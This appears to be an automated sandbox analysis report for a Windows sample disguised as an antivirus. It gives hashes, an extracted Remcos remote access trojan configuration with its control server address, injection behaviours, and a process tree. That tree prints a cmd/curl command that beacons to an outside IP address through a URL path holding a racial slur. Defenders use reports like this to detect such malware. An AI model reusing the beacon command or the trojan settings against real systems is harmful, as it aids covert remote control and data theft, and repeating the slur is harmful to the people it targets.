Analysis
-
max time kernel
141s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
22-04-2024 11:57
Static task
static1
Behavioral task
behavioral1
Sample
och_ex_antivirus.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
och_ex_antivirus.exe
Resource
win10v2004-20240412-en
General
-
Target
och_ex_antivirus.exe
-
Size
17.0MB
-
MD5
eb33ab953cc1efc9a57c6c9db447a587
-
SHA1
e5657e79caa5722ac87a0b933f9a22d4b4844f71
-
SHA256
042767e0fa4fa7fe964a771a9d743ebb740d4f9a1e59609c704f51958310b1ff
-
SHA512
69b6ed09d38a85bef70ff52e7833d060163c0b6bddd271d81f801a99513da2985d5d25dcb971b57b00504053b93068e5921142abb13ed05c33e1e1d5c4841c78
-
SSDEEP
196608:C0bq45mXYPrOLaw1ZiRaKUhi9TQvtzEXPg7V8/TLZ5:/bq4oojOLahUhi9z/PTLr
Malware Config
Extracted
remcos
RemoteHost
178.33.57.155:443
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-PM1AI7
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
Processes:
ptSrv.exeptSrv.exepid process 3948 ptSrv.exe 1856 ptSrv.exe -
Loads dropped DLL 12 IoCs
Processes:
ptSrv.exeptSrv.exepid process 3948 ptSrv.exe 3948 ptSrv.exe 3948 ptSrv.exe 3948 ptSrv.exe 3948 ptSrv.exe 3948 ptSrv.exe 1856 ptSrv.exe 1856 ptSrv.exe 1856 ptSrv.exe 1856 ptSrv.exe 1856 ptSrv.exe 1856 ptSrv.exe -
Processes:
och_ex_antivirus.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA och_ex_antivirus.exe -
Drops file in System32 directory 1 IoCs
Processes:
explorer.exedescription ioc process File opened for modification C:\Windows\SysWOW64\explorer.exe explorer.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
ptSrv.exedescription pid process target process PID 1856 set thread context of 956 1856 ptSrv.exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
ptSrv.exeptSrv.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl ptSrv.exe Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION ptSrv.exe Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl ptSrv.exe Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION ptSrv.exe -
Modifies registry class 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
och_ex_antivirus.exeptSrv.exeptSrv.execmd.exepid process 3232 och_ex_antivirus.exe 3232 och_ex_antivirus.exe 3948 ptSrv.exe 1856 ptSrv.exe 1856 ptSrv.exe 956 cmd.exe 956 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
ptSrv.execmd.exepid process 1856 ptSrv.exe 956 cmd.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
ptSrv.exeptSrv.exedescription pid process Token: SeTakeOwnershipPrivilege 3948 ptSrv.exe Token: SeTakeOwnershipPrivilege 3948 ptSrv.exe Token: SeTakeOwnershipPrivilege 1856 ptSrv.exe Token: SeTakeOwnershipPrivilege 1856 ptSrv.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
och_ex_antivirus.exeptSrv.exeptSrv.execmd.exeexplorer.exeWScript.execmd.exedescription pid process target process PID 3232 wrote to memory of 3948 3232 och_ex_antivirus.exe ptSrv.exe PID 3232 wrote to memory of 3948 3232 och_ex_antivirus.exe ptSrv.exe PID 3232 wrote to memory of 3948 3232 och_ex_antivirus.exe ptSrv.exe PID 3948 wrote to memory of 1856 3948 ptSrv.exe ptSrv.exe PID 3948 wrote to memory of 1856 3948 ptSrv.exe ptSrv.exe PID 3948 wrote to memory of 1856 3948 ptSrv.exe ptSrv.exe PID 1856 wrote to memory of 956 1856 ptSrv.exe cmd.exe PID 1856 wrote to memory of 956 1856 ptSrv.exe cmd.exe PID 1856 wrote to memory of 956 1856 ptSrv.exe cmd.exe PID 1856 wrote to memory of 956 1856 ptSrv.exe cmd.exe PID 956 wrote to memory of 1084 956 cmd.exe explorer.exe PID 956 wrote to memory of 1084 956 cmd.exe explorer.exe PID 956 wrote to memory of 1084 956 cmd.exe explorer.exe PID 956 wrote to memory of 1084 956 cmd.exe explorer.exe PID 1084 wrote to memory of 2472 1084 explorer.exe WScript.exe PID 1084 wrote to memory of 2472 1084 explorer.exe WScript.exe PID 1084 wrote to memory of 2472 1084 explorer.exe WScript.exe PID 2472 wrote to memory of 4980 2472 WScript.exe cmd.exe PID 2472 wrote to memory of 4980 2472 WScript.exe cmd.exe PID 2472 wrote to memory of 4980 2472 WScript.exe cmd.exe PID 4980 wrote to memory of 1500 4980 cmd.exe curl.exe PID 4980 wrote to memory of 1500 4980 cmd.exe curl.exe PID 4980 wrote to memory of 1500 4980 cmd.exe curl.exe PID 956 wrote to memory of 1084 956 cmd.exe explorer.exe PID 1084 wrote to memory of 4660 1084 explorer.exe WScript.exe PID 1084 wrote to memory of 4660 1084 explorer.exe WScript.exe PID 1084 wrote to memory of 4660 1084 explorer.exe WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe"C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe"1⤵
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exeC:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exeC:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe5⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO7⤵
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\SysWOW64\curl.execurl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO8⤵PID:1500
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\upeegjbouopehpnbxkclalylbt.vbs"6⤵PID:4660
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
146B
MD585a2ebad40c21ba1da77230265b5351f
SHA1803822e08837ebda5de7dde963e4872ae2fc4c21
SHA256b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9
SHA51277374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a
-
Filesize
5.4MB
MD547842103e2e4b1f02de9a4dea3b65dcc
SHA111bb3c3c1ad4f6b4fc7769ecf14b4f9e5ede5dda
SHA2560cb81803e081f6491491f74f857d6e738307ede06bd3e9e39f4b5f44c0bd2548
SHA51218d986698df11ad9032fa0fc90417f0f6b411158c73d93824ec6030908b5d1f5ddbcd4628f7fcab5b8bf04e559ac39b6a85c24449cb126c0b26a9bb24d77b322
-
Filesize
1.2MB
MD588a381396c6d9e97c422942355b39f5d
SHA1d3e47ef8fa3191f3f4806a6051f2f4b7bbc667e1
SHA256367ecc25206001828a90b5d935a4cce9b90322d21fc9316a5c6dd431df8715c7
SHA5120545b57e97f1182da64ee4e12c8547979d0f6193c2b64a0d4d9f67e3797ec0d91a19218697bca1ea8b2b76c04ded1e798e5aa57f113beedb5e47b275362c990a
-
Filesize
427KB
MD571a0aa2d05e9174cefd568347bd9c70f
SHA1cb9247a0fa59e47f72df7d1752424b33a903bbb2
SHA256fdb3d86c512adff90967cb860d02a4682850ab96727f0376e4d4836504c50e47
SHA5126e65520528facaa4058720eb16d6bfdcc7bb36923b7e8e6551f3526709f0fabafab123999e618438e6abe7efed4a1332547cfc988f2b24b0e3d91198b95a911a
-
Filesize
81KB
MD516b26bc43943531d7d7e379632ed4e63
SHA1565287de39649e59e653a3612478c2186096d70a
SHA256346f72c9a7584c2ab6ce65cd38a616c77ebddc0bbab2274c4e89dd5e62237517
SHA512b5b7b4b8c5ab4276a34956e43f586272b1803ec3609253fee1bcc0a549aed7ba11d47404b023f7b67af701726bab95cca55738e7bd5bca272eca5ac71bb418cc
-
Filesize
590KB
MD5b3e030ab715a02f8864a79f552a247b7
SHA14b1c18370b6e8a69c5f8b3ff543375f74e6e58fa
SHA2562a844750786ab6798e9a26de7f080802f709c0f12ba7a31545f0c2e449ac0955
SHA512cd030a0a9e6109b27b5f5d3299024c222287487bc9fac1edd92b760425a939bc307b1d15801fec7e274bd8377b8dd9c7883674d1488af5f062a102275a373eda
-
Filesize
1.0MB
MD5a0a180d2677f494049d7a55c888fed93
SHA1d09358fddc9a67ae55b5ba4a34fba04357b528db
SHA2565e086150a36e2e98c91464a210499648832172f883c1bd515c4a0661a10866bd
SHA5121f152fe593a25c05973b351206a40953bd801b8c77f04c2f20c966869fe72d2b6c71ed5bd77e64942153f0dca590e2655340a93d8b7eb29d558152f1a7b6fde1
-
Filesize
28KB
MD5db3f3969e8a2f913fe3643d8465171b1
SHA1736095ea1e02547a6df2586fffdbf31bb7d23656
SHA256c207be09bf97912ed1271a4186bb626edc530c76f3e5edcac883a98946c41043
SHA5120a2948bad6e3f6338fb44a727e0de4d268db6a6e5933331b54b12877da0f3b75a796cb32e86cd251b4afc4ca9df5aaccb04db1153b31fc77318ce8909b18d81b
-
Filesize
2.5MB
MD52087eb2d3fb639933ebe0a0614fd5218
SHA1c1a1b75c8e76e000b7045092bd11100904a72840
SHA256725f50650cb9490027b633a1ff0ae166cb6fc42037dbe72d9a09dd65be323a1f
SHA5123390536ed543529d01ed7d1616d36d6fde67d68bf6641f901ac5c081ede043943dacd3a7a0bf1729945be800d4ccda00c07511e1c23c7c33d9864be50645502e
-
Filesize
202KB
MD564179e64675e822559cac6652298bdfc
SHA1cceed3b2441146762512918af7bf7f89fb055583
SHA256c26db97858c427d92e393396f7cb7f9e7ed8f9ce616adcc123d0ec6b055b99c9
SHA512ef740b35ea5190f8ee47776af1f15ebdd54d39c84da5665e64f67ae6dd0f4b181e955e9a35319a5d0bd764972562e8f2bc44dbdf83c3bedf05674eae902e7280
-
Filesize
165KB
MD53c3e960d59cb413791fee1e944b6df72
SHA14aa6c90d81692642ca8266bf0d8e249ff3e3ad54
SHA25688378c228d7827974fe6ec827837af7571290e129082e7070d4bff7a42f4ba67
SHA51285b471aa2a066c6a779384ed102b895af108af51cd718bb834cda107f71bf5e6fcd8ecc77e9ea4fd7fd3ddbc10b1f57870a9bafcbbfa1be8e2ba224651d77aac
-
Filesize
103KB
MD5c2b06a78b6c07a1371b6aed1dbf4fc37
SHA1b8847693e7cd3637b1b400e71430cdf629de2e64
SHA2569e2b2d67d0e70651a64a3febee9f2698d8a939633587fe973a30758368cffc04
SHA512219965e4b3e9f237f75d9306bdf5a08c872cded973009da64c58221e1bbdbfda35e4861c4c0b6687fca7c67ef496b307695af5e1270f8d5c3cf71a3fc02c6411
-
Filesize
324B
MD55969db124f530f24b0e1b305ca5a8291
SHA15eb79a70cc356a20ba39913489a5cdca36f83011
SHA2563a4ae3a89b9c1d79fbef06dd969b1307837c0378966c5f7ceddafb1e4660a072
SHA5120297ea245560c1b5fe64f5a3cd7769ea4e9f09dfc4cc4f16c8d96c5b5d846c8982458991aa143ea5a103436a03c5e7d5b7769b2b87bca5565e856de960e2e290